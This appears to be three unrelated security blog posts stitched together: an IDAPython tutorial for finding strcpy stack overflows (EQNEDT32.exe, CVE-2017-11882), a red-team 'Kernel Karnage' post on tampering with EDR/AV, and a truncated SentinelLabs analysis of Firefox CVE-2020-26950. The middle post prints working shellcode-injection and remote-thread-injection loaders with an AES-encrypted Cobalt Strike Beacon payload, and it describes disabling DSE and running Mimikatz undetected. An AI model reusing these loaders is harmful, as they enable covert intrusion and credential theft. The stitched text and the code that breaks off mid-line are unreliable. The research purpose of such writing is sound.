   addr = FindText(ea+2,SEARCH_DOWN|SEARCH_NEXT, 0, 0, "rep movsd");
   ea = addr
   if "movsb" in GetDisasm(addr+7):
       print "strcpy found at 0x%X"%addr

 

If we run this against the EQNEDT32.exe, then we get the following output in IDA Pro:

Output of Script Against EQNEDT32.exe

 

If we begin to look at all of the instances where the script reports detected instances of inlined strcpy we find several instances where this script picks up other functions that are not strcpy but are similar. The most common function (other than strcpy) that this script detects is strcat(). Once we think about the similarities in functionality between those functions, it makes a lot of sense. Both strcat and strcpy are dangerous string copying functions that copy the entire length of a source string into a destination string regardless of the size of the destination buffer. Additionally, strcat introduces the same dangers as strcpy to an application, finding both with the same script is a way to kill two birds with one stone.

 

Now that we have code to find inlined strcpy and strcat in the code, we can add that together with our previous code in order to search specifically for inline strcpy and strcat that copy the data into stack buffers. This gives us the code snippet shown below:

 

# Check inline functions
info = idaapi.get_inf_structure()
ea = 0

while ea != BADADDR:
   addr = FindText(ea+2,SEARCH_DOWN|SEARCH_NEXT, 0, 0, "rep movsd");
   ea = addr
   _addr = ea

   if "movsb" in GetDisasm(addr+7):
       opnd = "edi" # Make variable based on architecture
       if info.is_64bit():
           opnd = "rdi"

      
       val = None
       function_head = GetFunctionAttr(_addr, idc.FUNCATTR_START)
       while True:
           _addr = idc.PrevHead(_addr)
           _op = GetMnem(_addr).lower()

           if _op in ("ret", "retn", "jmp", "b") or _addr < function_head:
               break

           elif _op == "lea" and GetOpnd(_addr, 0) == opnd:
               # We found the origin of the destination, check to see if it is in the stack
               if is_stack_buffer(_addr, 1):
                   print "0x%X"%_addr
                   break
               else: break

           elif _op == "mov" and GetOpnd(_addr, 0) == opnd:
               op_type = GetOpType(_addr, 1)

               if op_type == o_reg:
                   opnd = GetOpnd(_addr, 1)
                   addr = _addr
               else:
                   break

Running the above script and analyzing the results gives us a list of 32 locations in the code where a strcpy() or strcat() call was inlined by the compiler and used to copy a string into a stack buffer.

 

Improving Upon Previous Stack Buffer Check

Additionally, now that we have some additional experience with IDA Python, let us improve our previous scripts in order to write scripts that are compatible with all recent versions of IDA Pro. Having scripts that function on varying versions of the IDA API can be extremely useful as currently many IDA Pro users are still using IDA 6 API while many others have upgraded to the newer IDA 7.

 

When IDA 7 was released, it came with a large number of changes to the API that were not backwards compatible. As a result, we need to perform a bit of a hack in order to make our is_stack_buffer() function compatible with both IDA 6 and IDA 7 versions of the IDA Python API. To make matters worse, not only has IDA modified the get_stkvar() function signature between IDA 6 and IDA 7, it also appears that they introduced a bug (or removed functionality) so that the get_stkvar() function no longer automatically handles stack variables with negative offsets.

 

As a refresher, I have included the is_stack_buffer() function from the previous blog post below:

def is_stack_buffer(addr, idx):
   inst = DecodeInstruction(addr)
   return get_stkvar(inst[idx], inst[idx].addr) != None

First, we begin to introduce this functionality by adding a try-catch to surround our call to get_stkvar() as well as introduce a variable to hold the returned value from get_stkvar(). Since our previous blog post worked for the IDA 6 family API our “try” block will handle IDA 6 and will throw an exception causing us to handle the IDA 7 API within our “catch” block.

 

Now in order to properly handle the IDA 7 API, in the catch block for the we must pass an additional “instruction” argument to the get_stkvar() call as well as perform a check on the value of inst[idx].addr. We can think of “inst[idx].addr” as a signed integer that has been cast into an unsigned integer. Unfortunately, due to a bug in the IDA 7 API, get_stkvar() no longer performs the needed conversion of this value and, as a result, does not function properly on negative values of “inst[idx].addr” out of the box. This bug has been reported to the Hex-Rays team but, as of when this was written, has not been patched and requires us to convert negative numbers into the correct Python representation prior to passing them to the function. To do this we check to see if the signed bit of the value is set and, if it is, then we convert it to the proper negative representation using two’s complement.

 

def twos_compl(val, bits=32):
   """compute the 2's complement of int value val"""
   
   # if sign bit is set e.g., 8bit: 128-255 
   if (val & (1 << (bits - 1))) != 0: 
       val = val - (1 << bits)        # compute negative value

   return val                             # return positive value as is

   
def is_stack_buffer(addr, idx):
   inst = DecodeInstruction(addr)

   # IDA < 7.0
   try:
       ret = get_stkvar(inst[idx], inst[idx].addr) != None

   # IDA >= 7.0
   except:
       from ida_frame import *
       v = twos_compl(inst[idx].addr)
       ret = get_stkvar(inst, inst[idx], v)

   return ret

 

Microsoft Office Vulnerability

The Equation Editor application makes a great example program since it was until very recently, a widely distributed real-world application that we are able to use to test our IDAPython scripts. This application was an extremely attractive target for attackers since, in addition to it being widely distributed, it also lacks common exploit mitigations including DEP, ASLR, and stack cookies.

 

Running the IDAPython script that we have just written finds and flags a number of addresses including the address, 0x411658. Performing some further analysis reveals that this is the exact piece in the code that caused CVE-2017-11882, the initial remote code execution vulnerability found in Equation Editor.

 

Additionally, in the time that followed the public release of CVE-2017-11882, security researchers began to turn their focus to EQNEDT32.exe due to the creative work done by Microsoft to manually patch the assembly (which prompted rumors that Microsoft had somehow lost the source code to EQNEDT32.exe). This increased interest within the security community led to a number of additional vulnerabilities being subsequently found in EQNEDT32.exe (with most of them being stack-buffer overflows). These vulnerabilities include: CVE-2018-0802, CVE-2018-0804, CVE-2018-0805, CVE-2018-0806, CVE-2018-0807, CVE-2018-0845, and CVE-2018-0862. While there are relatively scarce details surrounding most of those vulnerabilities, given the results of the IDAPython scripting that we have performed, we should not be surprised that a number of additional vulnerabilities were found in this application.

 

Introduction to IDAPython for Vulnerability Hunting

Overview

IDAPython is a powerful tool that can be used to automate tedious or complicated reverse engineering tasks. While much has been written about using IDAPython to simplify basic reversing tasks, little has been written about using IDAPython to assist in auditing binaries for vulnerabilities. Since this is not a new idea (Halvar Flake presented on automating vulnerability research with IDA scripting in 2001), it is a bit surprising that there is not more written on this topic. This may be partially a result of the increasing complexity required to perform exploitation on modern operating systems. However, there is still a lot of value in being able to automate portions of the vulnerability research process.

In this post we will begin to describe using basic IDAPython techniques to detect dangerous programming constructs which often result in stack-buffer overflows. Throughout this blog post, I will be walking through automating the detection of a basic stack-buffer overflow using the “ascii_easy” binary from http://pwnable.kr. While this binary is small enough to manually reverse in its entirety, it serves as a good educational example whereby the same IDAPython techniques can be applied to much larger and more complex binaries.

Getting Started

Before we start writing any IDAPython, we must first determine what we would like our scripts to look for. In this case, I have selected a binary with one of the most simple types of vulnerabilities, a stack-buffer overflow caused by using `strcpy` to copy a user-controlled string into a stack-buffer. Now that we know what we are looking for, we can begin to think about how to automate finding these types of vulnerabilities.

For our purposes here, we will break this down into two steps:

1. Locating all function calls that may cause the stack-buffer overflow (in this case `strcpy`)
2. Analyzing usages of function calls to determine whether a usage is “interesting” (likely to cause an exploitable overflow)

Locating Function Calls

In order to find all calls to the `strcpy` function, we must first locate the `strcpy` function itself. This is easy to do with the functionality provided by the IDAPython API. Using the code snippet below we can print all function names in the binary:

for functionAddr in Functions():    
   print(GetFunctionName(functionAddr))

Running this IDAPython script on the ascii_easy binary gives us the following output. We can see that all of the function names were printed in the output window of IDA Pro.  

Next, we add code to filter through the list of functions in order to find the `strcpy` function that is of interest to us. Using simple string comparisons will do the trick here. Since we oftentimes deal with functions that are similar, but slightly differing names (such as `strcpy` vs `_strcpy` in the example program) due to how imported functions are named, it is best to check for substrings rather than exact strings.

Building upon our previous snippet, we now have the following code:

for functionAddr in Functions():    
    if “strcpy” in GetFunctionName(functionAddr):        
        print hex(functionAddr)

Now that we have the function that we are interested in, we have to identify all locations where it is called. This involves a couple of steps. First we get all cross-references to `strcpy` and then we check each cross-reference to find which cross references are actual `strcpy` function calls. Putting this all together gives us the piece of code below:

for functionAddr in Functions():    
    # Check each function to look for strcpy        
    if "strcpy" in GetFunctionName(functionAddr): 
        xrefs = CodeRefsTo(functionAddr, False)                
        # Iterate over each cross-reference
        for xref in xrefs:                            
            # Check to see if this cross-reference is a function call                            
            if GetMnem(xref).lower() == "call":           
                print hex(xref)

Running this against the ascii_easy binary yields all calls of `strcpy` in the binary. The result is shown below:

Analysis of Function Calls

Now, with the above code, we know how to get the addresses of all calls to `strcpy` in a program. While in the case of the ascii_easy application there is only a single call to `strcpy` (which also happens to be vulnerable), many applications will have a large number of calls to `strcpy` (with a large number not being vulnerable) so we need some way to analyze calls to `strcpy` in order to prioritize function calls that are more likely to be vulnerable.

One common feature of exploitable buffers overflows is that they oftentimes involve stack buffers. While exploiting buffer overflows in the heap and elsewhere is possible, stack-buffer overflows represent a simpler exploitation path.

This involves a bit of analysis of the destination argument to the strcpy function. We know that the destination argument is the first argument to the strcpy function and we are able to find this argument by going backwards through the disassembly from the function call. The disassembly of the call to strcpy is included below.

In analyzing the above code, there are two ways that one might find the destination argument to the _strcpy function. The first method would be to rely on the automatic IDA Pro analysis which automatically annotates known function arguments. As we can see in the above screenshot, IDA Pro has automatically detected the “dest” argument to the _strcpy function and has marked it as such with a comment at the instruction where the argument is pushed onto the stack.

Another simple way to detect arguments to the function would be to move backwards through the assembly, starting at the function call looking for “push” instructions. Each time we find an instruction, we can increment a counter until we locate the index of the argument that we are looking for. In this case, since we are looking for the “dest” argument that happens to be the first argument, this method would halt at the first instance of a “push” instruction prior to the function call.

In both of these cases, while we are traversing backwards through the code, we are forced to be careful to identify certain instructions that break sequential code flow. Instructions such as “ret” and “jmp” cause changes in the code flow that make it difficult to accurately identify the arguments. Additionally, we must also make sure that we don’t traverse backwards through the code past the start of the function that we are currently in. For now, we will simply work to identify instances of non-sequential code flow while searching for the arguments and halt the search if any instances of non-sequential code flow is found.

We will use the second method of finding arguments (looking for arguments being pushed to the stack). In order to assist us in finding arguments in this way, we should create a helper function. This function will work backwards from the address of a function call, tracking the arguments pushed to the stack and return the operand corresponding to our specified argument.

So for the above example of the call to _strcpy in  ascii_easy, our helper function will return the value “eax” since the “eax” register stores the destination argument of strcpy when it is pushed to the stack as an argument to _strcpy. Using some basic python in conjunction with the IDAPython API, we are able to build a function that does that as shown below.

def find_arg(addr, arg_num):
   # Get the start address of the function that we are in
   function_head = GetFunctionAttr(addr, idc.FUNCATTR_START)    
   steps = 0
   arg_count = 0
   # It is unlikely the arguments are 100 instructions away, include this as a safety check
   while steps 


  

Using this helper function we are able to determine that the “eax” register was used to store the destination argument prior to calling _strcpy. In order to determine whether eax is pointing to a stack buffer when it is pushed to the stack we must now continue to try to track where the value in “eax” came from. In order to do this, we use a similar search loop to that which we used in our previous helper function:

# Assume _addr is the address of the call to _strcpy 
# Assume opnd is “eax” 
# Find the start address of the function that we are searching in
function_head = GetFunctionAttr(_addr, idc.FUNCATTR_START)
addr = _addr 
while True:
   _addr = idc.PrevHead(_addr)
   _op = GetMnem(_addr).lower()    
   if _op in ("ret", "retn", "jmp", "b") or _addr 


  

In the above code we perform a backwards search through the assembly looking for instructions where the register that holds the destination buffer gets its value. The code also performs a number of other checks such as checking to ensure that we haven’t searched past the start of the function or hit any instructions that would cause a change in the code flow. The code also attempts to trace back the value of any other registers that may have been the source of the register that we were originally searching for. For example, this code attempts to account for the situation demonstrated below.

... 
lea ebx [ebp-0x24] 
... 
mov eax, ebx
...
push eax
...

Additionally, in the above code, we reference the function is_stack_buffer(). This function is one of the last pieces of this script and something that is not defined in the IDA API. This is an additional helper function that we will write in order to assist us with our bug hunting. The purpose of this function is quite simple: given the address of an instruction and an index of an operand, report whether the variable is a stack buffer. While the IDA API doesn’t provide us with this functionality directly, it does provide us with the ability to check this through other means. Using the get_stkvar function and checking whether the result is None or an object, we are able to effectively check whether an operand is a stack variable. We can see our helper function in the code below:

def is_stack_buffer(addr, idx):
   inst = DecodeInstruction(addr)
   return get_stkvar(inst[idx], inst[idx].addr) != None

Note that the above helper function is not compatible with the IDA 7 API. In our next blog post we will present a new method of checking whether an argument is a stack buffer while maintaining compatibility with all recent versions of the IDA API.

So now we can put all of this together into a nice script as shown below in order to find all of the instances of strcpy being used in order to copy data into a stack buffer. With these skills it is possible for us to extend these capabilities beyond just strcpy but also to similar functions such as strcat, sprintf, etc. (see the Microsoft Banned Functions List for inspiration) as well as to adding additional analysis to our script. The script is included  in its entirety at the bottom of the post. Running the script results in our successfully finding the vulnerable strcpy as shown below.

Script

def is_stack_buffer(addr, idx):
   inst = DecodeInstruction(addr)
   return get_stkvar(inst[idx], inst[idx].addr) != None 

def find_arg(addr, arg_num):
   # Get the start address of the function that we are in
   function_head = GetFunctionAttr(addr, idc.FUNCATTR_START)    
   steps = 0
   arg_count = 0
   # It is unlikely the arguments are 100 instructions away, include this as a safety check
   while steps 


  

Full Script Posted at: https://github.com/Somerset-Recon/blog/blob/master/into_vr_script.py

Kernel Karnage – Part 9 (Finishing Touches)

It’s time for the season finale. In this post we explore several bypasses but also look at some mistakes made along the way.

1. From zero to hero: a quick recap

As promised in part 8, I spent some time converting the application to disable Driver Signature Enforcement (DSE) into a Beacon Object File (BOF) and adding in some extras, such as string obfuscation to hide very common string patterns like registry keys and constants from network inspection. I also changed some of the parameters to work with user input via CobaltWhispers instead of hardcoded values and replaced some notorious WIN32 API functions with their Windows Native API counterparts.

Once this was done, I started debugging the BOF and testing the full attack chain:

  • starting with the EarlyBird injector being executed as Administrator
  • disabling DSE using the BOF
  • deploying the Interceptor driver to cripple EDR/AV
  • running Mimikatz via Beacon.

The full attack is demonstrated below:

2. A BOF a day, keeps the doctor away

With my internship coming to an end, I decided to focus on Quality of Life updates for the InterceptorCLI as well as convert it into a Beacon Object File (BOF) in addition to the DisableDSE BOF, so that all the components may be executed in memory via Beacon.

The first big improvement is to rework the commands to be more intuitive and convenient. It’s now possible to provide multiple values to a command, making it much easier to patch multiple callbacks. Even if that’s too much manual labour, the -patch module command will take care of all callbacks associated with the provided drivers.

Next, I added support for vendor recognition and vendor based actions. The vendors and their associated driver modules are taken from SadProcessor’s Invoke-EDRCheck.ps1 and expanded by myself with modules I’ve come across during the internship. It’s now possible to automatically detect different EDR modules present on a target system and take action by automatically patching them using the -patch vendor command. An overview of all supported vendors can be obtained using the -list vendors command.

Finally, I converted the InterceptCLI client into a Beacon Object File (BOF), enhanced with direct syscalls and integrated in my CobaltWhispers framework.

3. Bigger fish to fry

With $vendor2 defeated, it’s also time to move on to more advanced testing. Thus far, I’ve only tested against consumer-grade Anti-Virus products and not enterprise EDR/AV platforms. I spent some time setting up and playing with $EDR-vendor1 and $EDR-vendor2.

To my surprise, once I had loaded the Interceptor driver, $EDR-vendor2 would detect a new driver has been loaded, most likely using ImageLoad callbacks, and refresh its own modules to restore protection and undo any potential tampering. Subsequently, any I/O requests to Interceptor are blocked by $EDR-vendor2 resulting in a "Access denied" message. The current version of InterceptorCLI makes use of various WIN32 API calls, including DeviceIoControl() to contact Interceptor. I suspect $EDR-vendor2 uses a minifilter to inspect and block I/O requests rather than relying on user land hooks, but I’ve yet to confirm this.

Contrary to $EDR-vendor2, I ran into issues getting $EDR-vendor1 to work properly with the $EDR-vendor1 platform and generate alerts, so I moved on to testing against $vendor3 and $EDR-vendor3. My main testing goal is the Interceptor driver itself and its ability to hinder the EDR/AV. The method of delivering and installing the driver is less relevant.

Initially, after patching all the callbacks associated with $vendor3, my EarlyBird-injector-spawned process would crash, resulting in no Beacon callback. The cause of the crash is klflt.sys, which I assume is $vendor3’s filesystem minifilter or at least part of it. I haven’t pinpointed the exact reason of the crash, but I suspect it is related to handle access rights.

When restoring klflt.sys callbacks, EarlyBird is executed and Beacon calls back successfully. However, after a notable delay, Beacon is detected and removed. Apart from detection upon execution, my EarlyBird injector is also flagged when scanned. I’ve used the same compiled version of my injector for several weeks against several different vendors, combined with other monitoring software like ProcessHacker2, it’s possible samples have been submitted and analyzed by different sandboxes.

In an attempt to get around klflt.sys, I decided to try a different injection approach and stick to my own process.

void main()
{
    const unsigned char shellcode[] = "";
	PVOID shellcode_exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	RtlCopyMemory(shellcode_exec, shellcode, sizeof shellcode);
	DWORD threadID;
	HANDLE hThread = CreateThread(NULL, 0, (PTHREAD_START_ROUTINE)shellcode_exec, NULL, 0, &threadID);
	WaitForSingleObject(hThread, INFINITE);
}

These 6 lines of primitive shellcode injection were successful in bypassing klflt.sys and executing Beacon.

4. Rookie mistakes

When I started my tests against $EDR-vendor3, the first thing that happened wasn’t alarms and sirens going off, it was a good old bluescreen. During my kernel callbacks patching journey, I never considered the possibility of faulty offset calculations. The code responsible for calculating offsets just happily adds up the addresses with the located offset and returns the result without any verification. This had worked fine on my Windows 10 build 19042 test machine, but failed on the $EDR-vendor3 machine which is a Windows 10 build 18362.

for (ULONG64 instructionAddr = funcAddr; instructionAddr < funcAddr + 0xff; instructionAddr++) {
	if (*(PUCHAR)instructionAddr == OPCODE_LEA_R13_1[g_WindowsIndex] && 
		*(PUCHAR)(instructionAddr + 1) == OPCODE_LEA_R13_2[g_WindowsIndex] &&
		*(PUCHAR)(instructionAddr + 2) == OPCODE_LEA_R13_3[g_WindowsIndex]) {

		OffsetAddr = 0;
		memcpy(&OffsetAddr, (PUCHAR)(instructionAddr + 3), 4);
		return OffsetAddr + 7 + instructionAddr;
	}
}

If we look at the kernel base address 0xfffff807'81400000, we can expect the address of the kernel callback arrays to be in the same range as the first 8 most significant bits (0xfffff807).

However, comparing the debug output to the expected address, we can note that the return address (callback array address) 0xfffff808'81903ba0 differs from the expected return address 0xfffff807'81903ba0 by a value of 0x100000000 or compared to the kernel base address 0x100503ba0. The 8 most significant bits don’t match up.

The calculated offset we’re working with in this case is 0xffdab4f7. Following the original code, we add 0xffdab4f7 + 0x7 + 0xfffff80781b586a2 which yields the callback array address. This is where the issue resides. OffsetAddr is a ULONG64, in other words "unsigned long long" which comes down to 0x00000000'00000000 when initialized to 0; When the memcpy() instruction copies over the offset address bytes, the result becomes 0x00000000'ffdab4f7. To quickly solve this problem, I changed OffsetAddr to a LONG and added a function to verify the address calculation against the kernel base address.

ULONG64 VerifyOffsets(LONG OffsetAddr, ULONG64 InstructionAddr) {
	ULONG64 ReturnAddr = OffsetAddr + 7 + InstructionAddr;
	ULONG64 KernelBaseAddr = GetKernelBaseAddress();
	if (KernelBaseAddr != 0) {
		if (ReturnAddr - KernelBaseAddr > 0x1000000) {
			KdPrint((DRIVER_PREFIX "Mismatch between kernel base address and expected return address: %llx\n", ReturnAddr - KernelBaseAddr));
			return 0;
		}
		return ReturnAddr;
	}
	else {
		KdPrint((DRIVER_PREFIX "Unable to get kernel base address\n"));
		return 0;
	}
}

5. Final round

As expected, $EDR-vendor3 is a big step up from the regular consumer grade anti-virus products I’ve tested against thus far and the loader I’ve been using during this series doesn’t cut it anymore. Right around the time I started my tests I came across a tweet from @an0n_r0 discussing a semi-successful $EDR-vendor3 bypass, so I used this as base for my new stage 0 loader.

The loader is based on the simple remote code injection pattern using the VirtualAllocEx, WriteProcessMemory, VirtualProtectEx and CreateRemoteThread WIN32 APIs.

void* exec = fpVirtualAllocEx(hProcess, NULL, blenu, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

fpWriteProcessMemory(hProcess, exec, bufarr, blenu, NULL);

DWORD oldProtect;
fpVirtualProtectEx(hProcess, exec, blenu, PAGE_EXECUTE_READ, &oldProtect);

fpCreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)exec, exec, 0, NULL);

I also incorporated dynamic function imports using hashed function names and CIG to protect the spawned suspended process against injection of non-Microsoft-signed binaries.

HANDLE SpawnProc() {
    STARTUPINFOEXA si = { 0 };
    PROCESS_INFORMATION pi = { 0 };
    SIZE_T attributeSize;

    InitializeProcThreadAttributeList(NULL, 1, 0, &attributeSize);
    si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attributeSize);
    InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attributeSize);

    DWORD64 policy = PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON;
    UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, &policy, sizeof(DWORD64), NULL, NULL);

    si.StartupInfo.cb = sizeof(si);
    si.StartupInfo.dwFlags = EXTENDED_STARTUPINFO_PRESENT;

    if (!CreateProcessA(NULL, (LPSTR)"C:\\Windows\\System32\\svchost.exe", NULL, NULL, TRUE, CREATE_SUSPENDED | CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi)) {
        std::cout << "Could not spawn process" << std::endl;
        DeleteProcThreadAttributeList(si.lpAttributeList);
        return INVALID_HANDLE_VALUE;
    }

    DeleteProcThreadAttributeList(si.lpAttributeList);
    return pi.hProcess;
}

The Beacon payload is stored as an AES256 encrypted PE resource and decrypted in memory before being injected into the remote process.

HRSRC rc = FindResource(NULL, MAKEINTRESOURCE(IDR_PAYLOAD_BIN1), L"PAYLOAD_BIN");
DWORD rcSize = fpSizeofResource(NULL, rc);
HGLOBAL rcData = fpLoadResource(NULL, rc);

char* key = (char*)"16-byte-key-here";
const uint8_t iv[] = { 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f };

int blenu = rcSize;
int klen = strlen(key);

int klenu = klen;
if (klen % 16)
    klenu += 16 - (klen % 16);

uint8_t* keyarr = new uint8_t[klenu];
ZeroMemory(keyarr, klenu);
memcpy(keyarr, key, klen);

uint8_t* bufarr = new uint8_t[blenu];
ZeroMemory(bufarr, blenu);
memcpy(bufarr, rcData, blenu);

pkcs7_padding_pad_buffer(keyarr, klen, klenu, 16);

AES_ctx ctx;
AES_init_ctx_iv(&ctx, keyarr, iv);
AES_CBC_decrypt_buffer(&ctx, bufarr, blenu);

Last but not least, I incorporated the Sleep_Mask directive in my Cobalt Strike Malleable C2 profile. This tells Cobalt Strike to obfuscate Beacon in memory before it goes to sleep by means of an XOR encryption routine.

The loader was able to execute Beacon undetected and with the help of my kernel driver running Mimikatz was but a click of the button.

On that bombshell, it’s time to end this internship and I think I can conclude that while having a kernel driver to tamper with EDR/AV is certainly useful, a majority of the detection mechanisms are still present in user land or are driven by signatures and rules for static detection.

6. Conclusion

During this Kernel Karnage series, I developed a kernel driver from scratch, accompanied by several different loaders, with the goal to effectively tamper with EDR/AV solutions to allow execution of common known tools which would otherwise be detected immediately. While there certainly are several factors limiting the deployment and application of a kernel driver (such as DSE, HVCI, Secure Boot), it turns out to be quite powerful in combination with user land evasion techniques and manages to address the AI/ML component of EDR/AV which would otherwise require a great deal of obfuscation and anti-sandboxing.

About the author

Sander is a junior consultant and part of NVISO’s red team. He has a passion for malware development and enjoys any low-level programming or stumbling through a debugger. When Sander is not lost in 1s and 0s, you can find him traveling around Europe and Asia. You can reach Sander on LinkedIn or Twitter.

Firefox JIT Use-After-Frees | Exploiting CVE-2020-26950

Executive Summary

  • SentinelLabs worked on examining and exploiting a previously patched vulnerability in the Firefox just-in-time (JIT) engine, enabling a greater understanding of the ways in which this class of vulnerability can be used by an attacker.
  • In the process, we identified unique ways of constructing exploit primitives by using function arguments to show how a creative attacker can utilize parts of their target not seen in previous exploits to obtain code execution.
  • Additionally, we worked on developing a CodeQL query to identify whether there were any similar vulnerabilities that shared this pattern.

Contents

Introduction

At SentinelLabs, we often look into various complicated vulnerabilities and how they’re exploited in order to understand how best to protect customers from different types of threats.

CVE-2020-26950 is one of the more interesting Firefox vulnerabilities to be fixed. Discovered by the 360 ESG Vulnerability Research Institute, it targets the now-replaced JIT engine used in Spidermonkey, called IonMonkey.

Within a month of this vulnerability being found in late 2020, the area of the codebase that contained the vulnerability had become deprecated in favour of the new WarpMonkey engine.

What makes this vulnerability interesting is the number of constraints involved in exploiting it, to the point that I ended up constructing some previously unseen exploit primitives. By knowing how to exploit these types of unique bugs, we can work towards ensuring we detect all the ways in which they can be exploited.

Just-in-Time (JIT) Engines

When people think of web browsers, they generally think of HTML, JavaScript, and CSS. In the days of Internet Explorer 6, it certainly wasn’t uncommon for web pages to hang or crash. JavaScript, being the complicated high-level language that it is, was not particularly useful for fast applications and improvements to allocators, lazy generation, and garbage collection simply wasn’t enough to make it so. Fast forward to 2008 and Mozilla and Google both released their first JIT engines for JavaScript.

JIT is a way for interpreted languages to be compiled into assembly while the program is running. In the case of JavaScript, this means that a function such as:

function add() {
	return 1+1;
}

can be replaced with assembly such as:

push    rbp
mov     rbp, rsp
mov     eax, 2
pop     rbp
ret

This is important because originally the function would be executed using JavaScript bytecode within the JavaScript Virtual Machine, which compared to assembly language, is significantly slower.

Since JIT compilation is quite a slow process due to the huge amount of heuristics that take place (such as constant folding, as shown above when 1+1 was folded to 2), only those functions that would truly benefit from being JIT compiled are. Functions that are run a lot (think 10,000 times or so) are ideal candidates and are going to make page loading significantly faster, even with the tradeoff of JIT compilation time.

Redundancy Elimination

Something that is key to this vulnerability is the concept of eliminating redundant nodes. Take the following code:

function read(i) {
	if (i 

This would start as the following JIT pseudocode:

1. Guard that argument 'i' is an Int32 or fallback to Interpreter
2. Get value of 'i'
3. Compare GetValue2 to 10
4. If LessThan, goto 8
5. Get value of 'i'
6. Add 2 to GetValue5
7. Return Int32 Add6
8. Get value of 'i'
9. Add 1 to GetValue8
10. Return Add9 as an Int32

In this, we see that we get the value of argument i multiple times throughout this code. Since the value is never set in the function and only read, having multiple GetValue nodes is redundant since only one is required. JIT Compilers will identify this and reduce it to the following:

1. Guard that argument 'i' is an Int32 or fallback to Interpreter
2. Get value of 'i'
3. Compare GetValue2 to 10
4. If LessThan, goto 8
5. Add 2 to GetValue2
6. Return Int32 Add5
7. Add 1 to GetValue2
8. Return Add7 as an Int32

CVE-2020-26950 exploits a flaw in this kind of assumption.

IonMonkey 101

How IonMonkey works is a topic that has been covered in detail several times before. In the interest of keeping this section brief, I will give a quick overview of the IonMonkey internals. If you have a greater interest in diving deeper into the internals, the linked articles above are a must-read.

JavaScript doesn’t immediately get translated into assembly language. There are a bunch of steps that take place first. Between bytecode and assembly, code is translated into several other representations. One of these is called Middle-Level Intermediate Representation (MIR). This representation is used in Control-Flow Graphs (CFGs) that make it easier to perform compiler optimisations on.

Some examples of MIR nodes are:

  • MGuardShape - Checks that the object has a particular shape (The structure that defines the property names an object has, as well as their offset in the property array, known as the slots array) and falls back to the interpreter if not. This is important since JIT code is intended to be fast and so needs to assume the structure of an object in memory and access specific offsets to reach particular properties.
  • MCallGetProperty - Fetches a given property from an object.

Each of these nodes has an associated Alias Set that describes whether they Load or Store data, and what type of data they handle. This helps MIR nodes define what other nodes they depend on and also which nodes are redundant. For example, a node that reads a property will depend on either the first node in the graph or the most recent node that writes to the property.

In the context of the GetValue pseudocode above, these would have a Load Alias Set since they are loading rather than storing values. Since there are no Store nodes between them that affect the variable they’re loading from, they would have the same dependency. Since they are the same node and have the same dependency, they can be eliminated.

If, however, the variable were to be written to before the second GetValue node, then it would depend on this Store instead and will not be removed due to depending on a different node. In this case, the GetValue node is Aliasing with the node that writes to the variable.

The Vulnerability

With open-source software such as Firefox, understanding a vulnerability often starts with the patch. The Mozilla Security Advisory states:

CVE-2020-26950: Write side effects in MCallGetProperty opcode not accounted for
In certain circumstances, the MCallGetProperty opcode can be emitted with unmet assumptions resulting in an exploitable use-after-free condition.

The critical part of the patch is in IonBuilder::createThisScripted as follows:

IonBuilder::createThisScripted patch

To summarise, the code would originally try to fetch the object prototype from the Inline Cache using the MGetPropertyCache node (Lines 5170 to 5175). If doing so causes a bailout, it will next switch to getting the prototype by generating a MCallGetProperty node instead (Lines 5177 to 5180).

After this fix, the MCallGetProperty node is no longer generated upon bailout. This alone would likely cause a bailout loop, whereby the MGetPropertyCache node is used, a bailout occurs, then the JIT gets regenerated with the exact same nodes, which then causes the same bailout to happen (See: Definition of insanity).

The patch, however, has added some code to IonGetPropertyIC::update that prevents this loop from happening by disabling IonMonkey entirely for this script if the MGetPropertyCache node fails for JSFunction object types:

IonBuilder code to prevent a bailout-loop

So the question is, what’s so bad about the MCallGetProperty node?

Looking at the code, it’s clear that when the node is idempotent, as set on line 5179, the Alias Set is a Load type, which means that it will never store anything:

Alias Set when idempotent is true

This isn’t entirely correct. In the patch, the line of code that disables Ion for the script is only run for JSFunction objects when fetching the prototype property, which is exactly what IonBuilder::createThisScripted is doing, but for all objects.

From this, we can conclude that this is an edge case where JSFunction objects have a write side effect that is triggered by the MCallGetProperty node.

Lazy Properties

One of the ways that JavaScript engines improve their performance is to not generate things if not absolutely necessary. For example, if a function is created and is never run, parsing it to bytecode would be a waste of resources that could be spent elsewhere. This last-minute creation is a concept called laziness, and JSFunction objects perform lazy property resolution for their prototypes.

When the MCallGetProperty node is converted to an LCallGetProperty node and is then turned to assembly using the Code Generator, the resulting code makes a call back to the engine function GetValueProperty. After a series of other function calls, it reaches the function LookupOwnPropertyInline. If the property name is not found in the object shape, then the object class’ resolve hook is called.

Calling the resolve hook

The resolve hook is a function specified by object classes to generate lazy properties. It’s one of several class operations that can be specified:

The JSClassOps struct

In the case of the JSFunction object type, the function fun_resolve is used as the resolve hook.

The property name ID is checked against the prototype property name. If it matches and the JSFunction object still needs a prototype property to be generated, then it executes the ResolveInterpretedFunctionPrototype function:

The ResolveInterpretedFunctionPrototype function

This function then calls DefineDataProperty to define the prototype property, add the prototype name to the object shape, and write it to the object slots array. Therefore, although the node is supposed to only Load a value, it has ended up acting as a Store.

The issue becomes clear when considering two objects allocated next to each other:

If the first object were to have a new property added, there’s no space left in the slots array, which would cause it to be reallocated, as so:

In terms of JIT nodes, if we were to get two properties called x and y from an object called o, it would generate the following nodes:

1. GuardShape of object 'o'
2. Slots of object 'o'
3. LoadDynamicSlot 'x' from slots2
4. GuardShape of object 'o'
5. Slots of object 'o'
6. LoadDynamicSlot 'y' from slots5

Thinking back to the redundancy elimination, if properties x and y are both non-getter properties, there’s no way to change the shape of the object o, so we only need to guard the shape once and get the slots array location once, reducing it to this:

1. GuardShape of object 'o'
2. Slots of object 'o'
